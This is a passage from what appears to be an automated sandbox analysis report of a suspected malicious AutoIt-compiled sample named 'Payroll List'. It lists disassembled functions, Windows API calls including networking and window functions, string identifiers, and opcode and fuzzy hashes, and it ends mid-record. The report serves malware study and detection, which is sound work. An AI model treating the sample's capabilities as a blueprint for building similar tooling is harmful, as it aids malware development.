                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 2889604237-0
                                                                    • Opcode ID: 68b786fdf26a822d7aa2ec3827e01f255cc3635d5025c94d1161f9853caf4f06
                                                                    • Instruction ID: d42771ec08518ddc1c4fa8db0ec8ac7cae26219029a92609db7b9938eafb929e
                                                                    • Opcode Fuzzy Hash: 68b786fdf26a822d7aa2ec3827e01f255cc3635d5025c94d1161f9853caf4f06
                                                                    • Instruction Fuzzy Hash: 19E046B1500700EFDB005F70E84862D7BA8EB4D360F12C809F95F8BA10CB7898808B00
                                                                    Function 0015DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 0015DEAA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ContainedObject
                                                                    • String ID: AutoIt3GUI$Container
                                                                    • API String ID: 3565006973-3941886329
                                                                    • Opcode ID: fb27bdefa048394ce72ea51ba644af58388bd5779d83c5e58e7a7add337d2489
                                                                    • Instruction ID: 8006d3fee20a596a72a67ed75ef484605c26afaf15ee144492c006a121e16466
                                                                    • Opcode Fuzzy Hash: fb27bdefa048394ce72ea51ba644af58388bd5779d83c5e58e7a7add337d2489
                                                                    • Instruction Fuzzy Hash: 79913574600601EFDB24CF64D885A6AB7B9EF49711F20846EF86ACF691DB70E845CB60
                                                                    Function 0016DE7C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0013C6F4: _wcscpy.LIBCMT ref: 0013C717
                                                                      • Part of subcall function 0012936C: __swprintf.LIBCMT ref: 001293AB
                                                                      • Part of subcall function 0012936C: __itow.LIBCMT ref: 001293DF
                                                                    • __wcsnicmp.LIBCMT ref: 0016DEFD
                                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0016DFC6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                    • String ID: LPT
                                                                    • API String ID: 3222508074-1350329615
                                                                    • Opcode ID: c27666587f30f78c2b6174d16673b12fde408d81b07eb94d3108daf8c6f86a0c
                                                                    • Instruction ID: b510bce1ca1207102e0264eaea32a2c2209c38771a9fb7dfeaa41b2e9789becf
                                                                    • Opcode Fuzzy Hash: c27666587f30f78c2b6174d16673b12fde408d81b07eb94d3108daf8c6f86a0c
                                                                    • Instruction Fuzzy Hash: 0D61AE75A00215EFCB18DF98DC81EAEB7F4BF18310F1141AAF546AB291DB70AE51CB94
                                                                    Function 0013BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000), ref: 0013BCDA
                                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 0013BCF3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalMemorySleepStatus
                                                                    • String ID: @
                                                                    • API String ID: 2783356886-2766056989
                                                                    • Opcode ID: ee1195c5810059ed3250bb9b901afe970263bf849d7574f971ebe7e36a2c82c7
                                                                    • Instruction ID: 6f98ee2ec84bd2bd4360821122306c082eb7e7afcdcd2aecd5c9a2e6181273e3
                                                                    • Opcode Fuzzy Hash: ee1195c5810059ed3250bb9b901afe970263bf849d7574f971ebe7e36a2c82c7
                                                                    • Instruction Fuzzy Hash: BC5133714097449BE320AF14DC86BAFBBE8FFA5358F41484EF5D8420A6EB7085A88752
                                                                    Function 0016C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 001244ED: __fread_nolock.LIBCMT ref: 0012450B
                                                                    • _wcscmp.LIBCMT ref: 0016C65D
                                                                    • _wcscmp.LIBCMT ref: 0016C670
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscmp$__fread_nolock
                                                                    • String ID: FILE
                                                                    • API String ID: 4029003684-3121273764
                                                                    • Opcode ID: 780ec987be8f2a0830b28a5f878758ca766d10470ac4a03c8593d54d7c742376
                                                                    • Instruction ID: 9e3d25bcc93c2ce149d0d13d28a134f1f09613ebcecf47970c317da18ac31b84
                                                                    • Opcode Fuzzy Hash: 780ec987be8f2a0830b28a5f878758ca766d10470ac4a03c8593d54d7c742376
                                                                    • Instruction Fuzzy Hash: AB41D672A0421ABBDF20ABA4DC41FEF77B9EF59714F000069F605EB191D7709A14CBA1
                                                                    Function 0018A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0018A85A
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0018A86F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: '
                                                                    • API String ID: 3850602802-1997036262
                                                                    • Opcode ID: 08513ac8bbb7def52f5d6bae93c948a690f3f4d4a31b318dd1577f28e6450fa6
                                                                    • Instruction ID: 8c6b1be06b79a7f7c848059ea62a5334a5469babb5364ecc86560e1f84569095
                                                                    • Opcode Fuzzy Hash: 08513ac8bbb7def52f5d6bae93c948a690f3f4d4a31b318dd1577f28e6450fa6
                                                                    • Instruction Fuzzy Hash: E2410875E013099FEB14DFA8D880BDA7BB9FF09300F54006AE909AB341D771AA41DFA1
                                                                    Function 00175180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00175190
                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 001751C6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CrackInternet_memset
                                                                    • String ID: |
                                                                    • API String ID: 1413715105-2343686810
                                                                    • Opcode ID: 45800a3c6bbb186f210d07dc58e473e3981c657f45089bcf6528c13bcbe5f048
                                                                    • Instruction ID: a2c1cef6b81ac1109fdaf6f9e7c242cc882dbcc12ccce9bd7a45d482d55d2561
                                                                    • Opcode Fuzzy Hash: 45800a3c6bbb186f210d07dc58e473e3981c657f45089bcf6528c13bcbe5f048
                                                                    • Instruction Fuzzy Hash: C9311971C00119EBCF11EFA4DC85AEEBFB9FF28710F104015F915A6166EB71A956CBA0
                                                                    Function 0018975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 0018980E
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0018984A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$DestroyMove
                                                                    • String ID: static
                                                                    • API String ID: 2139405536-2160076837
                                                                    • Opcode ID: 8df05781e6337a9115da33589970403e9213aa46006e3c04fb8886654d41599e
                                                                    • Instruction ID: b8c9bde4ce54a3835aeacd351ca2ad139c15ec3087eb3dc5367b1c8bb532e791
                                                                    • Opcode Fuzzy Hash: 8df05781e6337a9115da33589970403e9213aa46006e3c04fb8886654d41599e
                                                                    • Instruction Fuzzy Hash: 8D319F71110608AEEB10AF74DC80BFB73A9FF99760F048619F8A9C7190CB31AD81DB60
                                                                    Function 00165157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 001651C6
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00165201
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: InfoItemMenu_memset
                                                                    • String ID: 0
                                                                    • API String ID: 2223754486-4108050209
                                                                    • Opcode ID: e34383bf3324bebcd7a1ef26a5e5e473d631fd0eec63fb7a75f82d93e718794c
                                                                    • Instruction ID: b41f1ef4bd531f78c733977c51a58c82e087a0fa8bc4611281b554e6f8bacab3
                                                                    • Opcode Fuzzy Hash: e34383bf3324bebcd7a1ef26a5e5e473d631fd0eec63fb7a75f82d93e718794c
                                                                    • Instruction Fuzzy Hash: C231F671A00704EBEB24CF99DC95BAEBBF6FF45354F14401DE986E61A0E7709A64CB10
                                                                    Function 0017658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: __snwprintf
                                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                                    • API String ID: 2391506597-2584243854
                                                                    • Opcode ID: fddc7246708960e60d28f418baa00548932712605c30af4cb035ff58a714f5cb
                                                                    • Instruction ID: f0f285ad5dda897fbbfc9473b936e6283f48be2002a2b94fdd7b4015179bf7d8
                                                                    • Opcode Fuzzy Hash: fddc7246708960e60d28f418baa00548932712605c30af4cb035ff58a714f5cb
                                                                    • Instruction Fuzzy Hash: 3621B471A00528AFCF14EFA4DC82EED77B5AF54740F404469F509AB181DB70EE65CBA1
                                                                    Function 001893CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0018945C
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00189467
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: Combobox
                                                                    • API String ID: 3850602802-2096851135
                                                                    • Opcode ID: d16ad827db3a13bf6ec2b68243d1b743b6cd4f358665718ffea86aa08c6df90e
                                                                    • Instruction ID: bc395afab15a6308e45c56dcb437cab29a1e79b1b76e55a655e8490a33130258
                                                                    • Opcode Fuzzy Hash: d16ad827db3a13bf6ec2b68243d1b743b6cd4f358665718ffea86aa08c6df90e
                                                                    • Instruction Fuzzy Hash: 4911B2B1300209BFEF21AE64DCC0EBF376EEB983A4F150125F91997290D7719D528B60
                                                                    Function 001898FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0013D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0013D1BA
                                                                      • Part of subcall function 0013D17C: GetStockObject.GDI32(00000011), ref: 0013D1CE
                                                                      • Part of subcall function 0013D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0013D1D8
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00189968
                                                                    • GetSysColor.USER32(00000012), ref: 00189982
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                    • String ID: static
                                                                    • API String ID: 1983116058-2160076837
                                                                    • Opcode ID: 0c2a928b4f1153e8032b619aa88c820a725c669966886f4628d0c4e197c1c132
                                                                    • Instruction ID: f77555065918893d5ec6fa2e7b9e41d2a14cd4016c7fc71bb0a4c3b591780cac
                                                                    • Opcode Fuzzy Hash: 0c2a928b4f1153e8032b619aa88c820a725c669966886f4628d0c4e197c1c132
                                                                    • Instruction Fuzzy Hash: EA11297291020AAFDB04EFB8DC45AFA7BA8FB08354F054619F956E2250E734E950DB50
                                                                    Function 00189617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 00189699
                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001896A8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: LengthMessageSendTextWindow
                                                                    • String ID: edit
                                                                    • API String ID: 2978978980-2167791130
                                                                    • Opcode ID: 893b3a3ae9dd96b5252924c5b3e88434cdda5afb2f8052342b60a65854967e7d
                                                                    • Instruction ID: 8e9893e04165c5c95d06f5065ea0b5cfa51220e170ab37080dfcc33f083f1efd
                                                                    • Opcode Fuzzy Hash: 893b3a3ae9dd96b5252924c5b3e88434cdda5afb2f8052342b60a65854967e7d
                                                                    • Instruction Fuzzy Hash: AE118C71500108ABEF116FA4EC80EFB3B6AEB15378F644314F965971E0E771DD90AB60
                                                                    Function 00165262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 001652D5
                                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 001652F4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: InfoItemMenu_memset
                                                                    • String ID: 0
                                                                    • API String ID: 2223754486-4108050209
                                                                    • Opcode ID: f3382a6f787d7d218a086ff02c1e72877cf8a30edf881b2f8f49f5c1de407740
                                                                    • Instruction ID: c8461987689fb20e9fcefa0871f4f5dc3d7ae2bdfd6b36c1908a7519e4476717
                                                                    • Opcode Fuzzy Hash: f3382a6f787d7d218a086ff02c1e72877cf8a30edf881b2f8f49f5c1de407740
                                                                    • Instruction Fuzzy Hash: 73110476D01614EBDB24DF98DD44F9D77BABB05B54F050025E902E72A0D3B0ED54CB90
                                                                    Function 00174D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00174DF5
                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00174E1E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$OpenOption
                                                                    • String ID: <local>
                                                                    • API String ID: 942729171-4266983199
                                                                    • Opcode ID: 294c71bd30d5da078d5d95bf159955d05ab2cd6d907cc2f13f69babcab342b6c
                                                                    • Instruction ID: 59880a5bc04d4ecbcf1afa0201ef80dbfbbcfa56ac0ee022b07eaa032107ca59
                                                                    • Opcode Fuzzy Hash: 294c71bd30d5da078d5d95bf159955d05ab2cd6d907cc2f13f69babcab342b6c
                                                                    • Instruction Fuzzy Hash: FA117C70601621BBDB398FA1C889EFBFAB8FF26765F10C22AF55996540D7705980C6E0
                                                                    Function 0017A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0017A84E
                                                                    • htons.WSOCK32(00000000,?,00000000), ref: 0017A88B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: htonsinet_addr
                                                                    • String ID: 255.255.255.255
                                                                    • API String ID: 3832099526-2422070025
                                                                    • Opcode ID: 0c48d8155caa73339e30ec6df5c52e87112800bb412d2e699ec05d50697e1823
                                                                    • Instruction ID: 58ccad3a659abd75d038afb0bd3f80adfd5aca767f21a6ed7bcaaebbba43e0fa
                                                                    • Opcode Fuzzy Hash: 0c48d8155caa73339e30ec6df5c52e87112800bb412d2e699ec05d50697e1823
                                                                    • Instruction Fuzzy Hash: F0012275200304ABCB14AFA8D88AFADB374EF95314F10C426F91AAB3D1C731E8158792
                                                                    Function 0015B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0015B7EF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 3850602802-1403004172
                                                                    • Opcode ID: 095214cdc1346b0a5f34b41b67be4c8b4d9cd9858fa7117a19108c3c37eba713
                                                                    • Instruction ID: be4a0335652bca81d44705c94693b5852ee138a8a017c3ba8fb420087a17f416
                                                                    • Opcode Fuzzy Hash: 095214cdc1346b0a5f34b41b67be4c8b4d9cd9858fa7117a19108c3c37eba713
                                                                    • Instruction Fuzzy Hash: 3401D871640128EBCB04EBA4DC529FE3379BF65350704061DF9729B2D1EB70591CCB90
                                                                    Function 0015B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
